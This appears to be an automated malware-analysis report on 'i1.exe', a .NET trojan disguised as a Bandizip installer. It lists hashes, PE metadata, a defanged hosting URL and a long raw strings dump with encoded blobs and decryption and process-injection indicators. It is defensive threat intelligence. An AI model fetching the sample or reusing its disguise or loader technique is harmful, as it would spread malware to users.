MalScore
100/100
MalFamily
Malicious

i1.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 37/68 Related 2805
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 201.07 KB (205896 bytes)
Compile time: 2018-07-06 04:20:07
MD5: 8ec65b785938717294c75c2b6a15a0ce
SHA1: bd430f4e5334ee12b8270fcce1383e10146b073b
SHA256: 8f27a8c28b32fbef7d96966ec20db16ad7d93089dfce4311cb1b44d5e7fd6f07
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-07-09 23:09:03
Last submission: 2018-07-09 23:09:03
Filename detected: - i1.exe (1)
URL file hosting
hXXp://timmason2.com/demoami/bab/i1.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-07-07 12:10:01 [37/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x30bc1 199680 8efe6552ae5d41cbb80accb6ea616ccc 4a5acde19f0b63b477ae4b69418ea09774ab1b84
.rsrc 0x34000 0x6f2 2048 10f7692d8684cafde553b976c324a12d 6658856385baf648725c276522df0159f2a08362
.reloc 0x36000 0xc 512 7b845fff4bafedde077f666a233b2dcb 1fc199394bc37b172d8d22ad1e91cb2869d0a859
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x3406c 424 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x34250 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x342a0 556 LANG_ENGLISH SUBLANG_ENGLISH_US
RT_MANIFEST 0x34508 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright(C) 2011-2016, Bandisoft.com, All rights reserved.
Translation: 0x0409 0x04b0
FileDescription: Bandizip Setup File
ProductVersion: 5.13
FileVersion: 5.13.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
KERNEL32.dll
mscoree.dll
IP Found
6.9.0.114
URL(s)
No URL found
String too long
ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd},ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0=,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd}
5Y2D5a625Y2D5pel5YWr5b6IXYXhmWEtjMXVTUHcyMkhTQ0poQVdFYTZEamhEU3BDaU9NengyV2QzckNOSWVVVnZyN1gwY0x4N2M2K3NJMlNYZQ== U2sxTjFXL2tMbFlQUzVyejJHUkZldz09<SVpSUGZNcGFFZ3lSNlpEeVhuT1lpSngwOFd6eDRaQVpXQy9QZE1uZmFtbz0=<OEU0a3lad2xRM0FKek1EVXlaVkQ0dE9TZkFReFdzbWcxbGVHL1gzdU9Rbz0=<enlZM3ZVSnJtb25CVFV1Yko5VUNDNVR6REhqNzFoWE9KM1NHcnJBS3R2VT0=<V05hdVVhaWxVaGNlV3ZOYWNYc29aWXhUU24yOHhVblhkYVpMeUFpVHR1VT0=<dzBxRXpjQ2E0TWNHOTdxRTFjZ0FDZFFscHJtRGExMTdWS1VYMWFtZ1pBbz0= cGRkM3paNWx3WHRqOGhWMUdLUmZWdz09 cXQ0dEhtVE9SWEZsdTA4YytzenAvQT09
 
Copyright(C) 2011-2016, Bandisoft.com, All rights reserved.
Version=
VarFileInfo
FileDescription
ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd},ezg2M2ViZDRlLTI1NWQtNGZmMS1hOGY1LWRlMWM4ZTBiMjFkYn0=,[z]{a8f28d60-e785-4aa9-a754-e1c776a2e7cd}
5.13.0.0
{eec0026b-85a0-405c-8e28-9095d82b4754}
.dll
null
"*)Nb
PublicKeyToken=
FileVersion
StringFileInfo
{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}, PublicKeyToken=3e56350693f7355e
Translation
Wrong Header Signature
aspnet_wp.exe
Bandizip Setup File
VS_VERSION_INFO
040904b0
! *)+),)-).)/)0)2131415161
5.13
neutral
ProductVersion
Culture=
{0}{1}\
LegalCopyright
, Version=
, Culture=
, PublicKeyToken=
{71461f04-2faa-4bb9-a0dd-28a79101b599}
w3wp.exe
Unknown Header
@sV^\
'MoT
n
EC
9|	+
DateTime
M?WiIZ9
6q2v
FtXo
:AGL
1uV$D
4#<\B
$r,{
Int32
q8jf
_z*1
v__V
kMv+R
Gnwa
SuspendCount
l+GvB
fy#95	@Q
J
}
3:,=
oc]E
cle6l
qa5%
TdQ
ResolveEventHandler
l@m)
K%gJ
QkJkqq
W
tTo
BS6G
$AQ"~
60K
tTBTk
BkCm	R'
!r#S
OXx+sAn
<\2,!9~
x[IT|K
Substring
N%0e
=F1K
wwl
o8Y;+
+"+#+((
LTKQ
QR&
f#Wb
K
Lh*
=*fY
z5k<#
Version
JtL
%:4<
CEVB+
CryptoStream
zd'N
Tl5
H_i[gI
BNfT
{TLwU.
LBmdsq1
lVFf
.&\?
=.bP\
N!
+K`
}E.f
dd'r
!gA'
O$q?
@Pf%U
qZfZK)
*.^Ai
PtrToStructure
2\c'
g,.c
Marshal
}:?_
1ZT
fL];L
i2~{h
,R.i
F.A6
buc]$~
l,n
3Ab5S
y*-6
WL'Z
>.VsGX
%	j3
v|-
%d{f?
m"{}
&`	pd
i|~B
RuntimeFieldHandle
y4j(
aFNl
w"	m$l%w8m
<CKZ
)ojIjr
Ed_%b
ky
a1
45uN
)>u
-yPa|
S\*-
G	gl
e%nhnH
,3&&
(bZ8\R
%|<#U}
g?V}X
EndInvoke
uorr
5{A3l-
IEnumerator
TIW@=n
b;o(%
@V>2
TBqf
/W`J
wgcsT
oUCl
5tJQ_
n.+@"f
&3v
3e6
}4xd8
\7GgfA
u	CH
CO-4
Write
RTzy+
MsK
YY7)
7}"U
+rO7
B#etI
2z~_
w<u'
Mva
Hopk|8
]]1nS
wS&I
1>VjL
iIfS
0SF
7Vx
K(
T-fEO*
=iV1
A<m
jh:o
/uVf
(Z M
WF%q
bY6
;<eb
(@"
W-f:
Zk]4
Format
'xKi
30=|
B-(
#fid
(:YVMXf
BBbw
xK?|
NrQ2
g70X
#eUh
wv:RU
v~;J
*r,/8$Z
@>9J
~jHi
AppDomain
Tw6
/,)
%n.iZ
$ s[
[
g{
get_CurrentDomain
8u##
JyM\L
:4a$
$`	-
E1sZi
8zXz
9XW[
Xr]W
RB3D"
X 
d
}>gpyfl
7)02"
:
=;
x;('/
A9W&s<
#X;Ar
N-{50
aWg;
Z	f
6LXA0
U
d?j
FromBase64String
[FOix
0\5*
Wb
Z
A?HV
DLayb
.G,I
UA~tZ
Path
qy}2
(pUc
$s&0
anu>
M|&k
5R?{}g
AEs}
laMr
=".%
%Yi<
dmGO#
Ostr^9
5HYO
(QkDX(
R\",
Oo68
-(&+
"[c+
h,,C
1
h(
7nC]
pJT
|#}R
ToUInt32
7wq
Oyl1
vMr;
rk-mt
auxvc
;e\3
Type
\P&`?
k*Gf
P }w.~
6j4
j-TFn
n5<k
isV]P
k{4B
'8: K8
B	6.
IsWebApplication
v6d>g
t%5
O,C8o
,SKj
m~|;9
rG;}
}8
6
KW'^|
4Lcm~$V
2P>8
P rX
h*>A
_B7$
InhJ-
4s5
SmartAssembly.MemoryManagement
jKP9R
get_ExecutablePath
At`
SI6
Char
EtG)V
#[
#
J /I
ProcessModule
y-5J
[1AFV
rr&Z
DJG[
=?=Mf
"u$T
h&(Z
get_Name
lGjF
iZ"@
{h{
]lo~
Q|x (
HashAlgorithm
"mk]N
=
LE
G{))KU
35_H
U!E"
|(dk
j
pH
cccw
.?YS
TIB
X/iB
k
gA{]E
*!}>
d3	c
Z$Du
6%[O
0
CwP
'\be
BB:M
T)UW
[G(I
k\5T
<gQYr
D
U|
E!]<
t-M`
m*H8YC/
2Lq;
^G,Q!
Cf F
y&tt
AGRS
8y}`
p>!
_r7{
v0[ae
?Gj
NSg4
KTrBEhH#
6	9
odS`
.text
rF;
rLR$!4
E;w
G
GetString
S6 c
6kx@
GetObject
dwMilliseconds
?	k\
U@f
Convert
6<?(
,	\Rj
o!!:[
D&8\
g9`F
System.Configuration
H&_{
x,E
3C@f
!u9#
(K{5
15Ez
(^8
=y^}
|sI0
5~
%
SmartAssembly.Attributes
F,
G
$YCx
GetFrames
uh{
B
&LUq
c" >
}qb
P"4h
HT*{
{	6
u
StackTrace
Monitor
*Ju1:"
LKFn
8q6"
@	"}
f
@/
;@.$i
f|5O
j8z+
N7G
/
CreateDirectory
4|\f(
: ~f
Fl`YE
#SB=7:-
CipherMode
!IV
aA$-,
CO77
mDL}*^
jQr
ugHU
vkqI
)YfM
[-yZ
I25zZGZmZHNwIyQkJC5leGUkJCQ= clJobnBoQnVnVWlSY1ZscFZnTGZqdz09<aWp1bFVibjhEUFBrZWU4TWR2MFBmM0pQWFRNTld2WVJPUk8rSmZvUFNBVT0= Um1ISGdXWFJZY0pUYmlldmh5WlZEQT09
6y7t
GetCallingAssembly
RuntimeTypeHandle
SDdp
udpI
bPTi
"Yog
=J)0[~
(y?*l9
?ZN,
iUO*J
UONH>Nc
PvQ
%,/_
a T9
1L>F
`.rsrc
G
I4
G7E*4
vH8}q
ueb!
]42W
CreateDecryptor
get_Default
@33p	)
@nh@?
y*j6
3qF.la
vau<
StackFrame
kernel32.dll
:ad
LUMOo
CK+
z
$h&a
G[:i
DY1q
I5K#
hoZ&R
@S9n
w/-w,Z
^_]B
6Fv<"
n2M}PG
;6R$
uyMh
;
\@
CVCVGR
BdBW
O4eh'
E^Sa
M&JiU
set_IsBackground
eUlJm
TRkG#
`=D/
$[H
{?\0
kkXa
Z6'NRx
FjCay
i1/2
l#^#
a2oB
}@7\
X*
8
|+K4hZ1
JLg PB
+Icl\a
(dNKK
PlatformID
_d}L
ul6B
`X"M
P,Dl
%z3:
- &&
f,A
-a~%
'[xL7q0R
+shN
Q5	7
(v.
5c?T
#+Lm
;	\
GetProcAddress
wq6QRI&
}z8\
w?'6
5?p'
0X@	K
lUwF
_}lo
s{wc
2x,'
:~ax
GetBytes
\^5[
,/scz
hgyx
\=-$
Process
*_nJ
Rb+q)
s5Mn
_u1l
thB`
.\zn
kernel32
M<,UcC
l>EN
Pq31j
&{`z
@]5r
4p{h
: U-
u^cJ=
(r{r
$tT[s
JW}V
get_Assembly
=EIs
eT[
9]J[]
plie
~FE.
@9/k
S	H
PGW,
MySettings
l3;z%
FVGg
Y&y;
<	Kx
)IF}
[]
yPm/
X Z)
@qe
C DtCU
BXm
;c&
+[-6
d49t
z]`>
System.IO
#zq7
WrapNonExceptionThrows
get_Now
X4_iM
4/f/
fwD`
jS~U
c1e
EYAp
`&0c
y|=P
;s}1
j0{>
9eD7hQ
Ew'$
\kU-
9il(
9{Y.-
w?qa
:m*
]PIK
ZFpc
wj<V
3<*am
pjKKN6q
AttributeUsageAttribute
BJ|'
XD
a
a_Q[
|ip	y
lL

\603
T[CP
5a625rKh6YKj5q+S5pa55Y675a6255qE
STAThreadAttribute
Fe~
Hr"W
VEVNUA== b0FKOVBtL1JFVnZvNVVqS0xMTnFNQT09 cUoxcng2em8wSld2NmNYZXpDeU9HUT09
&`\>",
<[	0
mR$G
wjL64
hR
o(CO
#.z%b
/aY2
Ok&:
2Zk
aKHs
8,ao~7
d3.exe
W:(-LY
c0Tm
2 YM
j&mT
~U4`'
*Ex
uPx2
~1wp
System
EventArgs
Application
|`w7
bur8
IBf.<
3wWr
/1^
An&\(WY
LS%f?
+(~f
}_p
.(n(
bf>n0!~
e%md
M>7B
L(	8
j\rE
p;{.
]
pv
<?zm~U
a#u
I!K:
L*Ta6!
no&v
;I]L
_5B2
VO=0
MethodBase
#Strings
VEhSRUFEIFJFU1VNRSBGQUlMRUQ= QUJVS29jWEEvOFU4L2RUeVFxU2d4dz09<MHI0UStLZmZSU2hPTXJKWFE1YklQQlBmczJ1ZURVUUxoRWxScHZTTk9EOD0=<RmsyZVpJTUFwd2NJV1RFbWIyY1MraHBneFA4S1RBVkZWYk00R1BUTDJiND0=<c0Jnckd0S3o0aitwWjM5Vm5pVFBQNHlQTUJONFdIVlk0SVM4Wlk0Zm1TRT0=<MmR1UGRBZXRJb0tReTV4ZTV5MHMyVyszdW5HcldPL25oRjcrVTlLdzdNST0=<UnhLVlZidEgxNHBnamRYYXcyQzFZYldVUXh5d1RGYnFmL3BaQkI1MUo1Yz0= VGdPaEF5TjlZaXFkWWlyRDNReXR1QT09
c0-P
System.Collections
{Urb
DOXP
z3;-
no`1V}
,Wf5L
W8x0dl
$y&f
*P[O
p{B3
N@(
>'F6
b5	]
&t:q
x=1$
Environment
3r}"
=-@9)
n
-Z
3b+oSbH
?b2,h|
<6!-
U65Q
HH	M
E@tk
j)*O
$OQD
u`\L
&b].
OcNG
R8@%n
G7iR
7c_y`(
.$I&G[
aJ$_
oYL?
#jE
T]~pe
Uj8:
dYFbZ:OX
get_Position
System.Diagnostics
"qA
[
-V&+(~3
-H"Z
AVg8aoR'C
add_AssemblyResolve
ou+t
/&uVa
y^Ew
\PAc
OpenWrite
#D}m
,_l{
KY@<B
x{By
A|aG8o3`
(
G60
21aj
A
b
o2a>
u'XL
)-ZW
c$N^4
mg4}
ihs:
#CK8
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
A3!}
t4U(
>Z=>
|i~Q
/zP
tTnB_
>-Es
kMBK
X;F 4
ji<%{.!a
H5Li
Bq(dA
TryGetValue
}_Az
{k3%
sk+M>!
TR.dG
ud;A
ProjectData
nw<~
4hjD
]Y>bn9
z/NlAU}
<c3<M)
3n-5
5<PyB
Intern
MD5CryptoServiceProvider
3jQh
HrGF
74r~
Aw8R
<nIp%'
I3J1bmRsMzQzbDMyLmV4ZSM=
, '
-8=+B
>5
x
!\QM
get_UTF8
mEO\
3yHQ*
+<S0
9|>H
ContainsKey
Cr^Dd&
jLe|
(O}j
1M@m
''/TPfo
N/x
g;0y
*
8Y
M <I
J4%
N:+Y!
K|o>y
6w~B
fZ#%S
-b{(
+guh
nB)
O]8dM
RXf^KEG
c.g3
b`~c
$\%=
^QM)
(W^x
[@!(Z(
#%'"
|F
!
{
,>
IyV#
_b`}L
xKz
eMy
}fc}g
V'<<
_fM#
3z5D
F5Y|
qJ22
\
!v
_/-
+(~d
r^/Q
WiZQ%0
"m:n
>JZY
HX?=
bJ	W vC|
bvI#
:3RE
#zz|592/
{z}
1yx5
Delegate
xl?mO
SB5r(
Ivt<+
AssemblyName
yz5@M,
ev9B$
0RP'ugPQP4
gom}
Ns,S
t&Y''
]Do,z
lf#t
aJX5v
r|-lS
1=EUF
f;x@
R
w6
MH1{)
Go$	I
2@k(
L&o2
)l}"
z*L
Hyzqas
oz+:
gFW]tJ9
2Vfa
#GUID
GetProcessesByName
InitializeArray
+VZG
Ueb_
St8<
wPU|
]pR[
Enum
7^_S
$a-j
CopyArray
_2
Z+`
P+3}
a o=MZ
X$]?S
bX~6
@cv|5{
Uv1)
kC
Default
`6nJ
^g6
EU[i
h\h+
/muz3>xiC
get_Length
>;"\
rCR'
yRkbr
PgDi
DESCryptoServiceProvider
!
?3
\$v79
Dw>\
{"8|N
}]s2GQ
czBu
tJ~p
wd-P
3Er
CryptoStreamMode
?Q;h=E#
&+dZ
9-4
qt|H
nkE/
HU@.
3lW_
nh(UW\
B$WN
ValueType
System.CodeDom.Compiler
IT)pAi
ID+#7
SfI
_6sa
`e3Q_
6GWq
3
v<g,
"}3k
AR7(
ToLower
\&{FL
*wn
F<:_pB
n,2y:!
Jk"@n
k~0;
X}A
r-j
-C&&
[6GL
bkl^
Trim
zI||
+oem
,]+M
/
-\
uA
O
4-sIE
q_A
Djb;2
-cFQ
[2Kf
ul:(
%zh}*
%(pmZX
+$S!
;bYw
(LOod
EaW=
a	pv
nEB!]
4S|(
JS{q
rtYZ
w3R~X4
PKFpK
|LBf%
i#$,
`moNj
)Z&;
n_#a(
1SvcF
.	u
ToInt32
[4so
!
eI
StartsWith
NWcrQnhGSFhrZFRjRU0zY0VHZ2swQT09<c3NjcFJaVFNwdXVnRGdPdm1hUFBQdTZiL1g5Z1pSWWVLY3lhdndaM1dQTT0=<OTIzbFlvQWhiMnZWWElNNnUzTUN6akt1Z1ZEQlhaTWNiYjZUaGJzTDVyOD0=
.B#[*#R
x}W1
R3rUoS
}|8_
nD
5
ToString
Vd{|
'tS}
9Ipu
Utils
v+
+
5xOW
mY6v
."d9
/F0M
oC_
Yt`FH
~K-iT
vJK_
i/,S(
e.5g
q0S#r1
hUm)8
HC
4)
y.s=
ClearProjectError
mBTG
{eec0026b-85a0-405c-8e28-9095d82b4754}
LRNst
Split
&"]NH
?PP
#pWK
a?,Vc
ZRo*
@0]U3
a.e`
ZG>0
*.'fU[
V$k
X?~f
#U)f
ICryptoTransform
^D<N
,
}i
?dQ6
add_ResourceResolve
V C
NaI?
Dqt
>4@T~
`cK}2
25%zlF
h8G*EY
T-e
^[++
10.0.0.0
d7{Z
[=C7
4:ldU
dQzp
Gx_x
^EZ+
System.Security.Cryptography
&=Um
j^'S
IQw<
MemberInfo
{
Hi
aYz>H
SettingsBase
d|;(
Start
,lha
T,Xj
*Ps
h-5A
R<(H[
7T2:o
yH^Q;
7a(
&K"8
5Y2D5a625Y2D5pel5YWr5b6IXYXhmWEtjMXVTUHcyMkhTQ0poQVdFYTZEamhEU3BDaU9NengyV2QzckNOSWVVVnZyN1gwY0x4N2M2K3NJMlNYZQ== U2sxTjFXL2tMbFlQUzVyejJHUkZldz09<SVpSUGZNcGFFZ3lSNlpEeVhuT1lpSngwOFd6eDRaQVpXQy9QZE1uZmFtbz0=<OEU0a3lad2xRM0FKek1EVXlaVkQ0dE9TZkFReFdzbWcxbGVHL1gzdU9Rbz0=<enlZM3ZVSnJtb25CVFV1Yko5VUNDNVR6REhqNzFoWE9KM1NHcnJBS3R2VT0=<V05hdVVhaWxVaGNlV3ZOYWNYc29aWXhUU24yOHhVblhkYVpMeUFpVHR1VT0=<dzBxRXpjQ2E0TWNHOTdxRTFjZ0FDZFFscHJtRGExMTdWS1VYMWFtZ1pBbz0= cGRkM3paNWx3WHRqOGhWMUdLUmZWdz09 cXQ0dEhtVE9SWEZsdTA4YytzenAvQT09
"o9
Ux{I
(J
z`Ua0E
1o"v
j()1
BitConverter
`Mj?
PV]
:6Q'D
2:<`
?4}g
ToBase64String
::y^
<*F
](:
hm(g
|l%d
@^N7&L'
AB<.R
.ctor
JdcP
=[?cE
Jju
*
8)
mfuB
yFn/+DR
fnf||
=} 6
s~#j
J
W
j($9
T;JI
lgyg
$O1
HBS
f9&WX
+BFt
~6_0
]`yr
K;x=
*
8
Invoke
C8`u
DI24
XxmE
q,O[
vzH9
,;d'?
07T%
^"`qH
4rI
~7/T
p>q<
` }|
=$2kH
(%qg.
qFUb
`aBWC"
#fsT8L:n
g)^B:i
\y(+
t;1'
Module
*
8X
F-TX
7AEk!F
ie0O
GetManifestResourceNames
+.~d
Array
,?jj
;3,cJ
*
8W
~O$6
rJ#6{
@.reloc
GetPublicKey
DnzB
C)x54cBh
XKKvU
534LH
<L<f
l~
(
kryT.s
IaiH7
~VYu
/ &~
k8_ra
t9.$
B+*69J
J$4<
Byte
get_Chars
$`x-
s[eG
97B
uk?Hd
uK~A
qi
MoveNext
Dr9A
)gkt
|@:8
j~>j6D
2&aN
$"N:
~@q
o
=(
5V|
%
9L!a3
#.A\
VlBFWCBSRVBST1RFQ1QgRkFJTEVE
-e94
Toed+J
v3g
Ne=NM
_%OX
*aU'
y$@<
kn3?
thN
f+&E
pS
A/5_
|7Gd
2pc&
1Ix4
H:b[
_ )(7q
g`2
#AY}
&/(
~Z[k
PKy6/
P`Z',
F`xk
KC%Wxi@
hb{pm9'
BD"D
rCd(s
JJD\Aa
JUL8mD
MBfl
u:z'
:b?S9
5gIZ
t%}s
OL??
c,@,<s
#
hB
=^UThf
("0s
;wZ+R
yKSbR}mi
sKHm
FreeHGlobal
&p{}
;&lh
b>$,e
yZ,hdI
/
#@A
u.[{
{P60.e
;}DO
OqK5
PJbix4'8
pz# N
%dL
get_Item
SI]c
-f_p
}eb:
5piO6LS15ZOl6Zu25b6I5YWz
&	2H
`q\g
FileStream
hK8tP
Directory
KNTZ
C"1M
:4hl
}J%)
,2sy
_8jQ#3
ZPr#
7/9S
Assembly
xCrXa
J=sb
DelegateAsyncState
T436
AM/B|
InswfSI=
N/Rn
>
#h
ovV1
G
$A
q-Mc
:z^&
;q!b
{.lY
<J/p%
-
~7
&l.c-
XUig
X$}`Xr
#jrT
Exists
f5~.
v)y`
&fkYTi
gla
|;\e
6M:/.
BaFfO
Ox9]P
$ymlv
lpDebugEvent
Z^<f
C8)%,
5>Tg
`nHh
	*
8W
M8>>
I{RwH
Ca66
'S#aNw
8WY2
/4oR
Co`+
s
#bQ=
J"bn
!Wh
]S$W
(7Q\
3<XP3t$*
~Q8P>u
p?nZ
@k))L
~z}
m
Bl"?y
\"?Y
}%Ic
/Pt6
`<7
-)&&
3U$l
&}I
\bH:&
+h
K^jz
hG9T-Z
ah8<
TwEj
81
pCoB
0REJ
X
+
q%Ge
>&/%
get_BaseAddress
G=
 M
GpEOI
/vI,(
,Q&+
=.'-N
4_7
#Blob
Fy4xN
|eB%'
B~p^iA
%O"	/
CPTQ
96ta
(g
8H
mTvt
ResourceManager
RuntimeCompatibilityAttribute
e?xt
ls9z
GetExecutingAssembly
~2=b
A{/=n
6;%
kD%W
ay}%
+LA;d
$yRo'
*hWd
tKMT
$&o\
=[ Li
^;7j
vHCc
hI#z
v?$5dY
O*'HS
ZQ;+
uJ11
ToInt16
SetProcessWorkingSetSize
(
OcU
qX8\eL
hSs~
zgOq=~:
ReadByte
ml"r/O6G
n@jF
;`[K
]|"
PW4
CreateProjectError
k)J,
-=5R
Interaction
|_%F
?|}3
I(QOD
*..+UD
1z@d
GJm}'S=
9H[xZ
>T<
*.sx
2e 4
R(Xl_K\
)L^
AllocHGlobal
=6G"
"@cd+k~s
&N<4
|sz?
?`Ig
`0IS
yW#?
366%8t	+
>#}e
WJD$
zTe7
p@!o
XUV
?2,Z
Empty
O];
/[p:
Operators
arem
XN}{
'O{H
!|v?H
G58Uh
xc7:
ps`]
]7l$
{o*gg
M{[a
d,T;@p
0Ogd
#=z
% *L
IA==
yTaq
H/A
xm@UH
IndexOf
{
D=
X9Je
B|	]
(La'X
Y1{
w7_
ngKV
#UU<o
%}@^
SetProjectError
&o9Ov
J<5V5
xS=PrY
~tXQ
>j,w
':Q8
d7~M
ypj~
o%lm:
y'
2
"Powered by SmartAssembly 6.9.0.114
y8=_
q8Ko
4|yY
abj
`ew
O*Y;
ICZ{LLB
Read
b`bnV
-f#.
B
x}
C-9`
>%rU
L!'uV
7S,!S
_^eZ'
A.Z
Y`&
[W2[
JXj|x
value__
y|E@
6Y:
XA==
s 5s0
hX&D
:NX'Y
Yj
@
Iq0JL
-w&	(
wpgb
vmp|
nG	 <2k
tM,)*
jl\Z#_
EPp8
Rl_
u.K>*zc
/Y2-
Dt<=
;amfQ
d0,c
9xE
p6<;
^"]v
U/W	(
.9oC
^
7~Pw2h
.cctor
+@eZZ
AsyncCallback
#LU8n
B4
mscorlib
,Ay
Jx!
Z!K*
)
k^
@9sH
_}q2
A6G
GetMethod
'jYX
k%({1
\CGP
%HE@
GetObjectValue
$B}x
{L6"
`tc%
CU`@C
$]yL}
W>.E
,34
rDcI
Kill
NWGc
lkqF+
(Cp
}$*@
&cE&
|D`YrMkR
5So.
3x)X
Z-V6
p,C>D
xaMR
_&eKv
wE-t
6`o&
L0
}
~8"5
Ko@
ReadOnlyCollectionBase
._0H
)g~_B
System.Reflection
#E7:
w8	v
<1pP
1S[e
p+'w
iGA(
T@7z
MoveFileEx
,>&&
Xx
.X
%vrWSM
5?P
U1S43I
2"#>
G[-[
$;b}
>WniN/]
Qis]
1]6,8
^`Xe
SiX+
k%lb;J
t;-P
odmUWoR
O8hV\
,%pX
*,4i%
'U!)
^95
iD=pg
TME2
RSA1
Append
,}P$
$Qv8b
Rfc2898DeriveBytes
\OBs
op_Equality
9:
G
5Zgi
]V7
+:
^8o{
SNoiF
7!]x
,
Zf
/
an
BKY
Delete
u3GK
`.%&
@WTNc
w
l~
t8CS
\0kR
0:,@F
15OZ
:]Uqz[AQ
h-kI
A<
{0v+.
{Z@2[gA
L4a
oGvx
/@Cn
JsS?
+y$wP
,PYX-
)!-
RK9
EndApp
@;f|{
/r,5
D[H9
bE8%[
'FX,j
kTX7
ju#$
YJ\>
Ln.{T
."_s!
e5Nt
laFN
w,O
fD2H
O'Lh
ZE%)k
u`S/-
+9+>+C+(
C
Gu
h<V)
Environ
Y2ZmZmZmZmZmZmZmZmZmZmZmZg==
xqBH
G<9
,
&	Xx
nR,CU
&C!0
U_L%
@vZ
XtLK
MhKYn
mscoree.dll
!This program cannot be run in DOS mode.

$
DelegateCallback
<rB\?
File
z>E"
U&:Kzl
#]GoXJ
&o?!L
(gY
*vOE
Z8Ah
Dispose
=]M
Dv\D
9xDk
[&[F
GetCurrentProcess
Y//d
efnp
vkyR
dX++Dy
gLr9
J]ZE
8b(B_
;J&bPR
+I!+B4-
6$B4
gU%
SHnv
8=uP
M>/a/
z8v#RY
91>p
{a8f28d60-e785-4aa9-a754-e1c776a2e7cd}
.D-0K
HsZY?
QX(\
|x!.
rv*H/
&H	m?
PoweredByAttribute
N\Y122]E8
=jz1`7
m/+8
hara
S!&m?
Id
q
jPAt
KXC(
f
N;K
Os$*#
HX')
BSJB
{/AZ?
+G76
get_MainModule
\} p
Y~\f
e*2Muy
MU$}
88|JL
ZnNmc2Rmc2Rmc2Rmc2Rm
]
;b
op_Inequality
GetManifestResourceStream
sx9!G>
2wme
Ij&Ox
O
>Q
LoadFile
]iEx!Rl/
IntPtr
M%h-
2
2H$a2
-Eg:%
iZQ'
bYUG
ProcessModuleCollection
d5;H-W
6s]1
BuNY
6~%m-
oPs3]
+^<
QM<]
QfAVh
Zp(g
ebc6/x
0M
Vmv
QiBOK:
Bf8[uF
2 q!J
7p u
7^U@
UG473}
!k4}cM
D^
!RG@
InvalidOperationException
CDb7
Z*GO
L
QD
RijndaelManaged
=*=Jyx
. O
h;[i
/hW1
Jo)
=pGW
*pZh
ee,~
o


-<
?ra?
=
/ueS
SwE1
.G>3P
BlockCopy
yn[z
:_d"
C^@
JvnA
E n%
{8y^cE:]
*QE(fi
4ti8
7V\]
r$]|
SizeOf
Yj_i*
+
}Q8
wS8(
|:!h;
Luo(W
9[Y.
`qXAhH
hL*^
aGp$
uq+&
MemoryManager
|y
Io|)
~f\
$Qj;#`
#B\uK4Dtu
&&&&&
px>Y8
G Ke
@{?0
:zO=
c%,$b&
6yw'
Yjk
?u
=d&?J
GY]JL
>TiA
s[9T
Boolean
&+$~d
4;ii
6_n0
iDozS
IL2"
?Df
wK.#
`-Y%
s}5+
~=N
]V{sT{
A#$
;S
*0
H$Y=xw
J~,u
MemoryStream
ym,I
ResolveEventArgs
]6Bs
meis
u@R5
6tdS
#HaA<_
|$I
ZsbS
&{~B
'uvzf
Bjn{}
%OJ
$~YVw
<aL31
*8J
S<26
TvCLwH[Nh
U<8va
LmV4ZQ==
6!.T
f5
$sNy
>ia$
*8d
n6p%
&P]
&JxE
GA
p
*8t
Zsp-
{}|Q1
U;TL
Microsoft.VisualBasic
^DkQ
hj9n
inr
w%%h^
$JvX
mn)l
)e,p
.-Wz
osSf
u1"tYl
ThreadStart
S.L
>Cy#
7|XR
S(yBb
ES<
;~R!
*83
-"vd(]
~ZF4Q
|3w+
DLD	H0
or)'wO^
[m:8
Et^
>/XwY
mX:S
VlBFWCBGSVJTVCBGQUlMRUQ=
258\
_vE:
vO-':
Sk-
get_Handle
,i0Z
O-B3D	2
Concat
_6tIQ0
._
StringBuilder
+*f;
bmlh
9M>/
,V&&
.|-^
,V&+
w9S1
/Sq&
Z8tl
.Ci
VlBFWCBGSVJTVCBGQUlMRUQy
Y>Y fQt
Q9C"
o=$5M
}_no
lNFer#K
aE
xL
"bya
g_A=>
n2j~
CompilerGeneratedAttribute
K:]a
1~#-
`MS't`
WfWu
,&*(^
6@!7I3,
^cy,zH
ubf+
+'~D
n"MCTa
8}0
`X]w
aOg^
UXLI`
e=lsD
Z,Z
Copy
6dQq
!

#{
w| ;
AssemblyFileVersionAttribute
aM&CT
o*D}
.ZtN
GetTempPath
System.Text
GetName
TZpz
/V,d7
s
\oJHD\
;z\)
4i&2
System.Resources
)y"y
$<S!a
Jy,
v6Ju>
5!:]i
8$_H
(o2`
>g6>W
3
s]
GKtD
Z4I|
KUxx
YM\6
)$WO
}bLE
X	.v
mavk
0L@\
D4u:
K+=&
?+e
Hs<'8+
Qu2
~4`"
wu1Xs"
j.t
y\Rh
w
d/w
!lit
9$&
A	ah
G1tB
\'[*X
|
	mEW
DelegateAsyncResult
GT2t&#
1u]
b
I^mI
- E|
YnT\
3Pv$
%YRx
I5jMl
4+dj
y4y]
kgBOL!
l7Rbv
((
H
3_[@C6Aw
L
